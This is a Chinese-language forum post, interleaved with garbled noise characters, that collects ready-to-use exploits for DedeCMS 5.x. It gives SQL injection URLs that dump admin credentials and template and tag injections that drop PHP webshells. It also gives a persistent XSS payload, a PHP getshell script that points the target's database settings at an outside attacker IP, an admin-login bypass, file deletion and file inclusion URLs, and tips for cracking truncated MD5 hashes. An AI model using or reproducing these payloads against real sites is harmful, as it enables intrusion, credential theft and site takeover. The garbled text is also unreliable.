|
|
+ _) A+ \- A; E- V9 rDedecms 5.6 rss注入漏洞
3 Q; K7 r+ h) @, C) _! qhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=11 \* v+ n6 Z+ S
8 {0 l! w0 f" ]4 r3 V/ t
: K/ Y1 K8 u2 T2 ^# N" u3 h8 j
' X6 b: h* B: V* Q
! t) ]. E4 C; [ F5 e3 P; s6 |/ f* f& h" R* Q; p5 s
" f- B4 q3 q2 V
4 o6 y8 k" k3 M# j# s4 n
$ ^8 t* ~& j4 i2 bDedeCms v5.6 嵌入恶意代码执行漏洞
2 W$ v- T; [: D' E0 l, P3 P注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
7 N l! H5 `$ H, u+ @+ U& [5 y* H发表后查看或修改即可执行
( v1 Q6 P& ~5 ?5 Ha{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
/ c3 V3 ^4 u8 D* P生成x.php 密码xiao,直接生成一句话。9 {1 M7 h5 y. j, Z0 g0 S( `1 o7 M( q
4 q2 T# c+ }+ W& r4 N9 m' I! A3 j- I* Y: @
3 n; z( ]$ F5 u4 Y$ i- F4 Z# f9 e: b# O- X; L7 e! R
4 E; M# C2 A8 T- P" \0 d
+ @( ]0 O& v/ h. |6 A7 p% w
/ o. A1 f2 g- I) J+ o! r% D# I7 |7 d! @1 E |
Dede 5.6 GBK SQL注入漏洞
9 l1 [7 b$ [( P0 s- Mhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';: ^' X+ C# K0 O5 h8 ^ S
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe5 \! z2 ^8 n( S. b! V$ y! a6 T( q
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
' P" m( a- N' J# c/ |- j' v
5 d# F7 I2 l* ~$ S/ i8 j
% H: `$ e6 {8 }! Z8 \4 X) G' b" I
0 B( b$ l8 T. v; _9 s( O
' _* C3 U3 {- b2 d/ |- X4 a- G/ g. ^& F; C& U" }0 i
7 A5 }* @( i3 D# `& f+ z0 {
( p, A. L/ y7 `% j4 pDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
# X v7 U& X& [' s9 Dhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` $ `3 W' h; b$ d' a+ [$ s
. r0 s4 G; X1 K0 e% c& |3 s) c- K
. k+ n" ], O; X- M& A; z. ?( c: A- y+ m2 e! D0 Y/ v4 k
8 t& D5 k. Y& f% i2 X) A5 m& u+ ~
' h, i6 R0 K( e# a$ O; w) S
w+ s/ H' }. x% ^" CDEDECMS 全版本 gotopage变量XSS漏洞' D% u+ G" e+ z
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
2 B! }7 u5 _" S0 R$ U5 Whttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
, J0 Z2 O) J8 o4 J- c
) I; O( w; S# ? V: l/ ^* g
( O' { q6 o, z3 d8 S# d9 C2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 % j$ N$ s" K4 x$ N6 z" [" G5 G7 f! Z
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
7 B Z# r a# M) ?1 C/ u$ t0 b8 i% \
" {' y8 G4 c9 e3 W! W) _ k
http://v57.demo.dedecms.com/dede/login.php, g7 D& M ?( P, K& n' o4 u
8 {# ?2 Y1 G0 s5 y, M1 k) E$ e
) r5 x$ T P9 q/ b' p7 _color=Red]DeDeCMS(织梦)变量覆盖getshell! ?$ K3 I9 N3 G: Y1 v) O2 C
#!usr/bin/php -w% x, o* a% ]! o1 N+ [" ]" K7 I
<?php
4 A" n* t/ K) E* l7 E( ]9 \+ A$ Cerror_reporting(E_ERROR);/ t6 |. x* a/ ~$ A7 G% W
set_time_limit(0);
/ v- b1 ]8 @. O& l3 P& y: l$ wprint_r('
+ f. ]; H% J2 a/ R5 Q, Q$ DDEDEcms Variable Coverage2 D2 J! k- q d6 x4 c7 o
Exploit Author: www.heixiaozi.comwww.webvul.com j. D/ ]3 Q. b- {5 v. a
);5 Z( z8 a8 B. g, n+ O' v
echo "\r\n";2 Z) O& R1 D, O0 I
if($argv[2]==null){/ M, B* S( l- w( u$ ~% x
print_r('
0 ^! p% h8 {" w- f+---------------------------------------------------------------------------+4 Z( D5 n# l3 {$ M
Usage: php '.$argv[0].' url aid path
/ m& x. i/ S% Caid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
0 |- m1 C5 I0 \, @Example:2 g2 B; v" h6 N; n; j" |* g. r
php '.$argv[0].' www.site.com 1 old- P4 z7 O+ V6 G# Y. s' }/ t2 |
+---------------------------------------------------------------------------+7 Q. f9 G/ }8 r0 g" ]
');* n' |+ O7 N$ H% ?- C$ I3 h
exit;
4 b/ J" u* L/ X. j( l}
# S; m- B: o; c8 u6 n1 X6 R% O$url=$argv[1];
* {+ Z4 l8 V6 |' Q$aid=$argv[2];" B/ F% Z4 f( W1 l3 G% f
$path=$argv[3];
/ i7 R' a/ |5 W# {/ }+ Y$exp=Getshell($url,$aid,$path);
% @- S- k- c) Bif (strpos($exp,"OK")>12){" L( a$ {7 U) l( o$ V
echo "3 ~7 X6 W* r6 b! V5 F. [2 a2 F
Exploit Success \n";
) t9 e& A& h5 S7 H/ L6 r4 ~ nif($aid==1)echo "3 a1 m' M4 R# V/ R
Shell:".$url."/$path/data/cache/fuck.php\n" ;
, c5 ?( {& _" F1 F& C
& Y! \, \0 g) n5 h
' Q. W. E- u0 b V. ^( F9 \if($aid==2)echo "
" I4 w$ H+ M' b' Z3 g; uShell:".$url."/$path/fuck.php\n" ;+ n" G. ?3 U/ s" J
. S9 c( H1 V) [1 j9 ^* s
( P4 b- b) L9 x' f
if($aid==3)echo "
, t/ w2 F+ x b3 W& {Shell:".$url."/$path/plus/fuck.php\n";
$ q4 a* a1 _! A5 q/ b; I, L% Y& t% b4 @: F: w" K" A
7 I7 i! H. R0 g}else{
7 V, l$ g* N( U* O% J* Gecho "
1 N/ M+ M2 |2 F( M9 O- gExploit Failed \n";( k6 c- ]# e9 M( `; ?! q9 M$ Q
}- C0 S7 u9 d7 i
function Getshell($url,$aid,$path){; A( g! z k' u$ r; w6 o
$id=$aid;
; K! C$ r% ~: b& a+ {# w$host=$url;5 e+ Y7 X8 g- D! a3 Q) r. Z4 |
$port="80";
, P/ A% v8 R( a- t$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
, u$ j( ~7 L3 \' f$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
- Y7 H" x! J* R/ j% @$data .= "Host: ".$host."\r\n";, m- `, { H- `( t
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
. B$ ?. K" l8 v# _4 O" ^- L$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";8 C" P+ J6 r- L9 x) ~( q, C
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";% F* d- U# x' v. p
//$data .= "Accept-Encoding: gzip,deflate\r\n";. l' j6 b9 n3 V3 D8 d, x8 A
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
) J Y& X3 N8 w- v% A5 F$data .= "Connection: keep-alive\r\n";' k" t6 J9 N+ h* h5 k
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";# u8 K7 l8 I: z( \8 q" l0 ~
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
% x: ]0 O5 R' `* j* ^. k6 A6 }$data .= $content."\r\n";
' x6 j0 f8 l9 X4 x" g5 h$ock=fsockopen($host,$port);6 ~0 T. Z/ q6 P! `6 X3 W
if (!$ock) {
; I/ }: {. `- M- lecho " L' f+ ~" z5 R/ }7 X- f5 `
No response from ".$host."\n";
1 ?; T. ]+ D1 q}
" s3 \) p# }6 e, y% Y6 ffwrite($ock,$data);
2 o* b& \1 t$ i$ h% }; wwhile (!feof($ock)) {
' c! j" r$ S3 Q$exp=fgets($ock, 1024);
2 B, X7 { o* L9 V- @# H2 Ireturn $exp;- M% v* a7 Z2 f
}
, S* ], ^4 c9 U1 C6 q" n1 S}2 a% p3 M0 A5 X8 e2 N6 p0 b, p
$ x6 [4 d6 ^ _. j) B9 k. g
+ E. }2 h7 D4 u( o9 @0 i; Y?>
y* g+ p2 A: e) N
/ A: F6 x) S, [) G2 f. p- U* @$ {7 T. |- g
9 s4 T; C: {& b) b# r( Y; {* J" u9 ?( W, W7 O0 \
, x$ }* e) p3 m4 _% n# [
2 p: [: j/ T1 T3 ~7 h C
y0 @) k3 b- ]; \& t& t+ e& y* @8 D
3 d+ B X$ c! d2 i* R& X6 k4 q
6 f% O) _* E$ i. Q
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)* X) ~& F, v- K( z
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root0 r4 B$ t4 q* F6 S1 J
! @3 o3 J; {/ n
2 Q O3 E* Q4 x. [1 z9 d7 n& _1 G% W把上面validate=dcug改为当前的验证码,即可直接进入网站后台
6 B- c7 L0 Z0 \: Y) n4 l1 V6 l- S$ l% M) w; \% r# a3 J
9 {& W; {# k9 m* _# ?+ d9 I6 B
此漏洞的前提是必须得到后台路径才能实现% T0 ?+ T' V5 a3 F% v
, v4 B3 p6 \1 F
$ C# y' {! h! f" E T
7 k V# ]7 T, K7 n
0 |; g. A' E2 y$ }
+ I7 v1 \3 @; q# W/ Z
8 G3 q. i6 F8 c: z* u; p0 K4 A! S0 V+ T
( o% o( R6 X; u& c! H6 m5 L7 J8 o; f; k, n4 k, E; @5 F& J
: v2 E4 I/ ]1 W4 \$ u4 M4 ?1 [0 m& x9 u. S8 s
Dedecms织梦 标签远程文件写入漏洞
2 j7 \9 n1 f8 J k' n! ~6 ~前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');. j/ H& d' r/ w7 n$ j) u
: I. F8 j4 U( ?/ f
+ b: S" l( R, I3 K( i; h, q
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 # L- ~5 a+ @7 x* q) o9 i2 L$ i
<form action="" method="post" name="QuickSearch" id="QuickSearch">6 K5 @6 m* w3 t" v
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
8 ?, U! I0 M$ o0 O9 p; \$ Y: r<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
1 E! l. |, o; e, P7 b6 r<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
1 S" F- N3 f+ a: A! O3 \0 j<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />2 T; H: |/ I/ G+ b9 d5 U% e
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
7 ^) W8 t3 I8 | a5 m" x% k. `<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
- z3 c# A4 Z/ Q% a( J# ?, f4 |$ z# M<input type="text" value="true" name="nocache" style="width:400">" ]- k+ V' R) ~$ O; D- c$ d
<input type="submit" value="提交" name="QuickSearchBtn"><br />
+ r* z) E) N, ^7 `</form>. V' G2 w `* X+ t
<script>
$ @# Z; Q; B/ x e1 w, @( Sfunction addaction()1 e- f3 A8 J3 n: T
{
3 L% S# _9 i: G0 Sdocument.QuickSearch.action=document.QuickSearch.doaction.value;4 M$ ]+ j" O: Y* n, m
}: o1 l% N( E) B/ ]
</script>3 }3 y6 r- M! L3 W! Z6 B* m; N. G
, c3 \- x: m; k0 q& q
1 y- J# Z' R- z5 L3 x
8 `$ b6 u! p9 |9 K8 @, }2 j( H; x D4 E( n& p# O" |& T- @
, n* O5 |% Y" U$ U: W1 r l
# ]' `& T+ ]' ~/ X. r
e+ v3 O) M1 ~* x6 b/ @0 Q, v/ p j* W9 t" c+ p) Y4 I$ Q
; C4 H9 ^/ j% {2 l! u
6 I- O& l. L/ d3 A F" G) u( oDedeCms v5.6 嵌入恶意代码执行漏洞0 Z- N8 y! d* I- r/ a+ s
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
$ Q: I/ D Z0 S: Y2 Na{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}* f& H) Z- j4 s
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得 A: j0 p. l0 m% M% y+ X& }- F R- S
Dedecms <= V5.6 Final模板执行漏洞
. |) W9 O# V/ f' c注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:/ \7 t1 r; }: |0 P3 F# @! y, N( `
uploads/userup/2/12OMX04-15A.jpg- x# @( R6 n/ J, U Y
( K7 R" l1 P w5 U
1 t, M! i4 @3 F/ Z* ~! u8 w/ \% P模板内容是(如果限制图片格式,加gif89a): ~* `, X" q' [ Z6 s; G
{dede:name runphp='yes'}. ^9 T% |# w. v7 |" v& B* d6 {
$fp = @fopen("1.php", 'a');0 N7 T- S' \& ]# E2 s
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
" c7 f3 ?$ L5 G8 g6 I3 d1 D& @/ J$ I@fclose($fp); ^- y% {" F& ~4 |- n7 o6 R6 ~" _- ?
{/dede:name}
( ~3 @* _- q) B* ]' q2 修改刚刚发表的文章,查看源文件,构造一个表单:
! j; q4 a# R7 J7 M) C4 m<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
# k+ @- S. a( D/ q<input type="hidden" name="dopost" value="save" />4 Z3 _* h3 b; T$ ?
<input type="hidden" name="aid" value="2" />
2 U, _; Q+ w+ ^, t<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
" }. K& j j `' R<input type="hidden" name="channelid" value="1" />' z/ Y6 q& ?& _8 m
<input type="hidden" name="oldlitpic" value="" />8 T% R b3 T! U- b, `
<input type="hidden" name="sortrank" value="1275972263" />8 W( j7 n/ V5 J5 Z) P8 q/ P( p
9 g- P' |+ B! K
9 x9 s4 }6 w9 n8 {/ t+ k& K
<div id="mainCp">
; h, N; w2 W# W0 k5 s$ |' g, ]<h3 class="meTitle"><strong>修改文章</strong></h3>( W' q4 z3 M/ n' F2 {) T
2 \9 P2 E& a2 G2 b* u. w4 g1 i
7 s- d' y( ?5 `. R<div class="postForm">
+ i" G( {/ X* l2 L% @' C! ]/ C<label>标题:</label>
/ e$ ~, q% g; q3 O<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
+ T& f# T' u# H/ {; Z) f1 g. [4 Y& v- E. K* g: a9 y
. [% J$ \0 {# W+ i+ e
<label>标签TAG:</label>
- z& {4 F+ Z" y) |/ F<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)) i6 C& c3 Z# f! ^, ]5 A+ G8 y& l
7 v' o! V1 ]# U# t! F# b' c
G( }$ p# d6 C3 T) j9 x1 J, X
<label>作者:</label>* j: S; m/ ^0 G( _+ u
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>; i% }$ {: ^) G( C
2 y& V8 _$ Z" k J- T2 Z- o' d4 j1 Q# t B( a* }
<label>隶属栏目:</label>" {5 Q4 W r* j, x/ |: J% l
<select name='typeid' size='1'>0 P/ I7 s* e+ O) u2 C$ G
<option value='1' class='option3' selected=''>测试栏目</option>" N5 l4 p/ F C' z1 Q
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)2 l/ {; V% D ~$ ^0 t! ?
% D* `7 I) G3 ]% H
8 N( [* u3 _+ _1 H: g% N8 V3 ?1 e<label>我的分类:</label>
$ z/ h/ R3 C6 B1 W4 Q$ a<select name='mtypesid' size='1'>' ]9 j! @5 e) g; p
<option value='0' selected>请选择分类...</option>
8 C# K4 o7 ?/ v<option value='1' class='option3' selected>hahahha</option>
" S% a" l: f% p9 k4 {3 f: t& [</select>
6 m @& E) R' L9 f, X9 L
* {. h( a; N$ h9 X9 W' y2 U
) @. z4 z# ?, q/ R, R. f& h<label>信息摘要:</label>5 w* t; E& F3 n0 T- H0 E
<textarea name="description" id="description">1111111</textarea>
9 |, E& ^* ^1 D( u7 F2 }. D(内容的简要说明)
3 j0 |' {" i& J3 |. b( s
8 W2 W& B7 k9 q, h( d; m) O S! D/ s
<label>缩略图:</label>
9 f [# {: A, x( W; w6 O* V<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>3 }3 G9 Q+ Y: O3 j
7 h5 q( | c* t7 j4 n* @; m
; w8 O- W, g7 q4 C2 r3 P3 l& Q2 K% C: e! e
<input type='text' name='templet'
9 K' N. D7 K( d: l1 j5 y. yvalue="../ uploads/userup/2/12OMX04-15A.jpg">3 W" N! D$ q6 D
<input type='text' name='dede_addonfields'
D7 r& U% I( a, g4 ]- [value="templet,htmltext;">(这里构造)
5 y1 `' k/ q8 }</div>; U: Z, d" j M7 p, d
3 }- l! l3 L0 @# V) o* [
+ c; [6 F% ? S* ]<!-- 表单操作区域 -->$ Y; z& m. n$ S, p$ G" v1 t
<h3 class="meTitle">详细内容</h3>2 f( P7 ^1 y! Y+ F& l" G
! I( z, C! `( C0 w
- U! V# Y/ A& b- n: e, W+ l) U J
<div class="contentShow postForm">6 d+ I9 z$ z, u4 x& H/ g8 b
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
0 D" j# v: P1 \( ^' H
! |& o( {1 [" P& d" L, N! ]. _+ `) g( y. _
<label>验证码:</label>. ]( y$ a) F6 C6 F( h# [9 l3 K! Z$ E
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
$ a9 s# G2 n0 j4 ` U2 o( ^<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
! ]& G- W }4 q4 k% F/ ^8 g* K' m! r. g- y% V5 y5 C3 K
( n" C5 w4 r7 S# b' E# G' J+ u- L* m<button class="button2" type="submit">提交</button>
& a0 S) C3 G' u. z<button class="button2 ml10" type="reset">重置</button>
& m3 X0 u5 O" x9 [</div>
2 y9 D% ]" o2 X6 E" _6 Z
. F! h* ?" k2 `+ |5 I" q* @$ m9 N6 n% x
</div>
) t8 E7 p% s+ m) n1 I4 s% B, G' W* `" E/ I0 P: j2 s
) K. Q! \8 `8 R* `; j0 u. M; ?
</form>
) }1 v* c# G- I, i; v
" u; J; f$ u, G
3 X; y% ?1 K. B6 R# G/ S+ Z提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
# P2 w6 Z& d I( }+ K+ x假设刚刚修改的文章的aid为2,则我们只需要访问:
! i/ W8 o7 p# F- j) [ H3 f7 Fhttp://127.0.0.1/dede/plus/view.php?aid=2) }$ J$ a" @; K0 b0 w0 s
即可以在plus目录下生成webshell:1.php* j. W* y4 {! T$ K* K4 G1 o
: l2 w& y1 ?# H; H- B+ }1 e0 r- |$ c8 z
, X; y, \5 l) a `1 R8 s
2 ?+ v9 W6 [/ ~5 G$ V
7 p0 ~. f( r2 G
* G0 J2 K# w5 X) {) u( d) U( @
$ ~' p) H: L! G& ?5 Q
% g1 L! h3 s4 H0 m8 h' A$ A2 ?" h
/ C3 k, z0 _9 n0 I. ` k! d5 n% \; ^# b; i* W# j" {+ H* s! B# i
6 }( ?' F8 B; g- s
. `- H: P b u# P4 t/ S" W' }
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
" m& _" H$ v4 u2 J) SGif89a{dede:field name='toby57' runphp='yes'}
; z: W0 C; {% J6 @/ G( @phpinfo();( q( ^# g& L' c+ V1 _4 b
{/dede:field}
L; |$ T% J' u: r保存为1.gif
! m) d* O; m7 t5 n. B<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> ' `: H. _0 I8 ]7 |; o
<input type="hidden" name="aid" value="7" /> * m+ m* [8 F+ C3 ^# `2 ^* g& u
<input type="hidden" name="mediatype" value="1" />
3 z3 I* V$ H0 A# P' y5 y<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> , M2 d) F+ B, |9 ~0 b; [! q
<input type="hidden" name="dopost" value="save" />
, k& W3 N4 s: X& ~4 |<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> % n# a) c$ D& ?$ a, [4 y7 w$ `
<input name="addonfile" type="file" id="addonfile"/> 8 p- e6 I4 Y: ^& L
<button class="button2" type="submit" >更改</button> 7 u/ g9 U# F/ y+ { {
</form>
: C0 ?1 z$ I1 q; {6 c$ O
+ n. F8 a& }, w" T* j! {; t; |1 n1 p
$ P) I2 [+ ?! L# Y! s构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
$ z- N( q4 e) J% C4 E发表文章,然后构造修改表单如下:2 `4 s8 `0 E4 z& n. `
+ B/ h# `7 [8 l$ x3 @' v# ^+ u( m1 n# N5 ]' O) X, [% {7 C% g/ T* B
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 3 C# Q* d3 R1 ^
<input type="hidden" name="dopost" value="save" />
7 o9 B& U, d8 Z# } S<input type="hidden" name="aid" value="2" />
8 ?. u3 t- o0 S5 ]- N6 V<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
' h8 v i( x" h4 A- ~, q<input type="hidden" name="channelid" value="1" /> 9 I' j2 d7 A+ u3 Z; }& l) X" Z
<input type="hidden" name="oldlitpic" value="" /> 2 [' }! ?: Y0 V) H3 Z4 ` \
<input type="hidden" name="sortrank" value="1282049150" />
& e0 y0 B: K! P- e<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
" S7 N) h# t* S, s8 p<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> " W/ [6 B9 E6 N" u+ q' Z
<select name='typeid' size='1'>
- N3 \5 U3 {' S' s<option value='1' class='option3' selected=''>Test</option>
# e6 G+ ^$ C8 b- X! q& i x, F<select name='mtypesid' size='1'> 7 K( B3 ~' w* U+ } k) _) p
<option value='0' selected>请选择分类...</option> T& t2 t+ G% s
<option value='1' class='option3' selected>aa</option></select>
# ]: k, u3 G5 n @- g7 I' H* y* Y- I<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> - |0 ^7 n0 m) @! A- l4 a$ S
<input type='hidden' name='dede_addonfields' value="templet"> + O1 G$ [: P: O8 m8 V7 | @
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 4 }/ R2 b& E+ G. `: X
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
- Y: B: ^7 j' x; G8 {<button class="button2" type="submit">提交</button> . I8 Y% u7 m- v
</form>
/ s. R, j7 [7 g6 T4 a7 w8 a- s3 B8 I$ a
& y5 X$ |9 R# W/ n7 j' s+ [) b
! \" j, j! {0 Q+ M4 j
- t( X3 N i8 @" T! c1 v- m; \
/ x' r0 E) `, T* i! X1 X7 W P8 b4 e3 Y. Q/ [
9 E8 Z2 W0 C9 D [8 \, o/ d; ~$ V* Q5 n2 F
6 U& o' }1 f9 j% K. x4 V5 C6 W2 L) ?' i' T
+ F% p! C+ N$ L: K. v3 I2 d9 R
织梦(Dedecms)V5.6 远程文件删除漏洞
4 L( h3 N7 f$ e' _ ?- |7 zhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif+ g1 \6 u$ c3 ]3 U' k. Q F* `( f
7 P$ k' h5 c0 D. F3 _+ E. Y5 h0 t4 l: g5 C/ L
$ }6 {" l# E; \# y6 Q. i. w: A J& w& s; r: R( x" {
: ^% i) P( ], N" g0 V
1 l; k n0 E8 ~- z# u8 {
' c2 `/ }5 c* q- s, O2 n4 v5 x- A S: y" R- n
! a1 y" W( {. R8 v
6 u5 V% Y, b: p织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
# F. K3 x2 {% u# W' uhttp://www.test.com/plus/carbuya ... urn&code=../../
) h( p0 Q3 H& d2 ?& Z& h, x3 N3 \. |5 t/ j! j8 c O
3 D% C) n; \& u8 W
- C. X8 |6 f$ ]8 V. Y7 W) B0 p' b5 M
* w1 C# M4 R3 K! D* Q- ]
( [& e' |' u+ t5 M
( ], o0 B' C: i& O& j8 t
8 s) {+ k1 v: _/ z
, R) y/ O: D, m7 I2 H
9 E0 [$ M' ~( E
0 L# ~3 q p, p7 \& Y$ hDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
9 m2 n! d7 J, [( u" r5 U6 T5 V- N5 qplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`, g# f4 w- Z$ g5 _2 I
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5& h( R0 z: G% V! o: o
$ ^' r% i% o, `
: J8 b2 M' h9 W7 J8 h4 H/ W( U
6 g; |, C5 H. v8 E
6 _4 G4 S1 N, v! c; K; o+ h+ a
6 U1 `5 y! l' {
. @$ y7 c1 m! p/ ]! f4 |' R, p, T
; i8 \- q4 M' c& g y. J9 n5 N# j6 w6 r" c% g8 c6 W
% z' @$ c1 i3 c. s5 b
4 D L% F6 T% J" w8 W4 _' K
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞( e: k1 F7 b0 d+ L2 D* P
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
$ h+ D# k. v9 u5 ]9 i% E$ d5 P5 j& P
/ |" K2 I* G. \# e" W
0 E1 f9 N& L5 ~. v/ ?( [6 O* R1 M% U0 C) i, P5 s$ M: ~) H
2 r1 X9 w* z3 m3 ~
8 j! W; P& M1 c) M* U2 ?) }, ~, M, V$ e
* j4 M% w" w. ^" r+ L. D0 p4 h! l
